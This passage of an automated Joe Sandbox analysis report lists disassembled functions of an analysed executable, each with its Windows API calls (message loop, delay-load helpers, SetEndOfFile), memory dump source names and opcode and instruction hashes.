                                                                                                                                          • Part of subcall function 007A991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007A992F
                                                                                                                                          • Part of subcall function 007A991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007A9940
                                                                                                                                          • Part of subcall function 007A991E: TranslateMessage.USER32(?), ref: 007A994A
                                                                                                                                          • Part of subcall function 007A991E: DispatchMessageW.USER32(?), ref: 007A9954
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchItemPeekSendTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4142818094-0
                                                                                                                                        • Opcode ID: 9e99fadcd0870961d04eae8a24334930fde36dc7415678b1d788b812d690cc52
                                                                                                                                        • Instruction ID: 5d2c116434e1c5a362a467ae5d13f3edc18bd17040dc7f3bf7fa963cfd591dd8
                                                                                                                                        • Opcode Fuzzy Hash: 9e99fadcd0870961d04eae8a24334930fde36dc7415678b1d788b812d690cc52
                                                                                                                                        • Instruction Fuzzy Hash: 8BD09E71144200FEDA116B51DD0AF0A7BA2BB98B05F008558B344340B286669D31AB06
                                                                                                                                        Function 007AC75F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 95dce026e3e7b0c172a79afc3ca606f6376acd325fefed24559697aaf47f9a73
                                                                                                                                        • Instruction ID: 9464b6f82330e65ea39449fef2b1475632c971d442076b5c7f3a293dfa43f3b8
                                                                                                                                        • Opcode Fuzzy Hash: 95dce026e3e7b0c172a79afc3ca606f6376acd325fefed24559697aaf47f9a73
                                                                                                                                        • Instruction Fuzzy Hash: EBB012D2268205BD3289D1042F0AF3B030CC0C2B15330C22FF400C0240E84C0C018533
                                                                                                                                        Function 007AC74B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 0d3458023d7ff1e228a1c6c616dd4d46d048a8a0d42b619df1421cfdd70c5b94
                                                                                                                                        • Instruction ID: 7c6944ba87f58ba55a83e873b815bae030c662c5d3da9a044f4475cfde8fcf00
                                                                                                                                        • Opcode Fuzzy Hash: 0d3458023d7ff1e228a1c6c616dd4d46d048a8a0d42b619df1421cfdd70c5b94
                                                                                                                                        • Instruction Fuzzy Hash: 1EB012D2278105BC3289D1041D0AF3B030CC0C2B15330C22FF800C0240E84C0C008533
                                                                                                                                        Function 007AC741 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: d123f8e52ee77fa2416cb6e20ba6c251883dd32177259e01729250a6c9babaee
                                                                                                                                        • Instruction ID: 69ac0505f4b1471442a595296491062b2d3b1ae0ec13e7565fedb7eb6ec8aeb3
                                                                                                                                        • Opcode Fuzzy Hash: d123f8e52ee77fa2416cb6e20ba6c251883dd32177259e01729250a6c9babaee
                                                                                                                                        • Instruction Fuzzy Hash: 25B012D2278005BC3289D1055D0AF3B030CD0C2B15330C32FF401C0240E94C0C008133
                                                                                                                                        Function 007AC726 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 37b0662932933752d71ec3fa2f036b4300e14c356c20f962697244df3f376736
                                                                                                                                        • Instruction ID: 14a90fff1ebe254c75454594a727afa4df6536609c9d2e4a68aa7a7a0a9b14bf
                                                                                                                                        • Opcode Fuzzy Hash: 37b0662932933752d71ec3fa2f036b4300e14c356c20f962697244df3f376736
                                                                                                                                        • Instruction Fuzzy Hash: 90B012E2268205BC364D91401D4EF3B031CC0C2B25330C32FF400D4140E84C1C40C533
                                                                                                                                        Function 007AC7C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: f5475e758452d7b1d0bf5424e935a40eb367625652f9c42565c4a4183fcf1d31
                                                                                                                                        • Instruction ID: 9010f4c640ba42f67a54e14ac11759dd8e98d3f40c1e4434cbd3f8647caf373e
                                                                                                                                        • Opcode Fuzzy Hash: f5475e758452d7b1d0bf5424e935a40eb367625652f9c42565c4a4183fcf1d31
                                                                                                                                        • Instruction Fuzzy Hash: BCB012E125C405BD32C5D1241D0AE37030DC0C2B15330C22FB400C1140E88C4C495037
                                                                                                                                        Function 007AC7B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 6d46837c2068948888f4a03b754933d43a9cda84a8ef5ea6a28e3701fab5764d
                                                                                                                                        • Instruction ID: f208655fc1e0f6548b52ffaefc0eaf878173ea240610cfdda748c20cd4d161dd
                                                                                                                                        • Opcode Fuzzy Hash: 6d46837c2068948888f4a03b754933d43a9cda84a8ef5ea6a28e3701fab5764d
                                                                                                                                        • Instruction Fuzzy Hash: 96B012E1258109BD32C9D1251C0AE37030CD0C2B15330C22FB400C0140E88C4C40413B
                                                                                                                                        Function 007AC787 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: c1c92f3da22e1d10d9d38489fc16eb2d5fe9c4dca714dcf30d6cc2386fb87866
                                                                                                                                        • Instruction ID: 477495d44cfcdbe4990cb2d804c516e226ba217a5ffc2c87daefad6c8fa61272
                                                                                                                                        • Opcode Fuzzy Hash: c1c92f3da22e1d10d9d38489fc16eb2d5fe9c4dca714dcf30d6cc2386fb87866
                                                                                                                                        • Instruction Fuzzy Hash: C8B012E1258505BD36C591201C4AD37030DC0C3B15330C22FB800C0040E98C5C444037
                                                                                                                                        Function 007AC778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 4f5ecce89355f6d697fadaf39f3939d208d63f371b5e96ecf237f817f14f39a8
                                                                                                                                        • Instruction ID: 3eb2baadc3d8715be615bdbe88ad8569d10ff805039cdfd9d64fa15d856ee24c
                                                                                                                                        • Opcode Fuzzy Hash: 4f5ecce89355f6d697fadaf39f3939d208d63f371b5e96ecf237f817f14f39a8
                                                                                                                                        • Instruction Fuzzy Hash: A6A001E62A9506BC368AA2516D0AE3B061CD4C6B653308A1FF80294291A9881C459532
                                                                                                                                        Function 007AC76E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 284959ce0ae110b22e539cb54c546a9a0a2d7e00820d97f0f0258e172e9876fd
                                                                                                                                        • Instruction ID: 3eb2baadc3d8715be615bdbe88ad8569d10ff805039cdfd9d64fa15d856ee24c
                                                                                                                                        • Opcode Fuzzy Hash: 284959ce0ae110b22e539cb54c546a9a0a2d7e00820d97f0f0258e172e9876fd
                                                                                                                                        • Instruction Fuzzy Hash: A6A001E62A9506BC368AA2516D0AE3B061CD4C6B653308A1FF80294291A9881C459532
                                                                                                                                        Function 007AC75A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: a6dc640b5398f6cc92249e1b57ef76a718c947ead8e3e3e37a418ed19ba156ac
                                                                                                                                        • Instruction ID: 3eb2baadc3d8715be615bdbe88ad8569d10ff805039cdfd9d64fa15d856ee24c
                                                                                                                                        • Opcode Fuzzy Hash: a6dc640b5398f6cc92249e1b57ef76a718c947ead8e3e3e37a418ed19ba156ac
                                                                                                                                        • Instruction Fuzzy Hash: A6A001E62A9506BC368AA2516D0AE3B061CD4C6B653308A1FF80294291A9881C459532
                                                                                                                                        Function 007AC7B1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 57a3e61194abcfbf1ca43c4e4f63b7aaa420abcd714ff6f5af3a0b0d261a6b79
                                                                                                                                        • Instruction ID: 6287f3dba7b0569a91e72082adfb4d93dce4a2f8643fe6c2ff66106750a6e26c
                                                                                                                                        • Opcode Fuzzy Hash: 57a3e61194abcfbf1ca43c4e4f63b7aaa420abcd714ff6f5af3a0b0d261a6b79
                                                                                                                                        • Instruction Fuzzy Hash: 02A001E62A9516BD328AA2616D0AD3B121CD4C6B653308A5EB84284191A9885C95943A
                                                                                                                                        Function 007AC7A7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC799
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: 3b42de26a9da4c317b01896249ea1533c35c06c8279ef06daa5a61cb37d9062d
                                                                                                                                        • Instruction ID: 6287f3dba7b0569a91e72082adfb4d93dce4a2f8643fe6c2ff66106750a6e26c
                                                                                                                                        • Opcode Fuzzy Hash: 3b42de26a9da4c317b01896249ea1533c35c06c8279ef06daa5a61cb37d9062d
                                                                                                                                        • Instruction Fuzzy Hash: 02A001E62A9516BD328AA2616D0AD3B121CD4C6B653308A5EB84284191A9885C95943A
                                                                                                                                        Function 007AC782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007AC738
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1269201914-0
                                                                                                                                        • Opcode ID: c8ecf1e140ea803cfed51f2c16e26def9beff28baee9a9f4b448e52f8f92b41f
                                                                                                                                        • Instruction ID: 3eb2baadc3d8715be615bdbe88ad8569d10ff805039cdfd9d64fa15d856ee24c
                                                                                                                                        • Opcode Fuzzy Hash: c8ecf1e140ea803cfed51f2c16e26def9beff28baee9a9f4b448e52f8f92b41f
                                                                                                                                        • Instruction Fuzzy Hash: A6A001E62A9506BC368AA2516D0AE3B061CD4C6B653308A1FF80294291A9881C459532
                                                                                                                                        Function 00799B6A Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetEndOfFile.KERNELBASE(?,00798EDB,?,?,-00001954), ref: 00799B6D
                                                                                                                                        Memory Dump Source
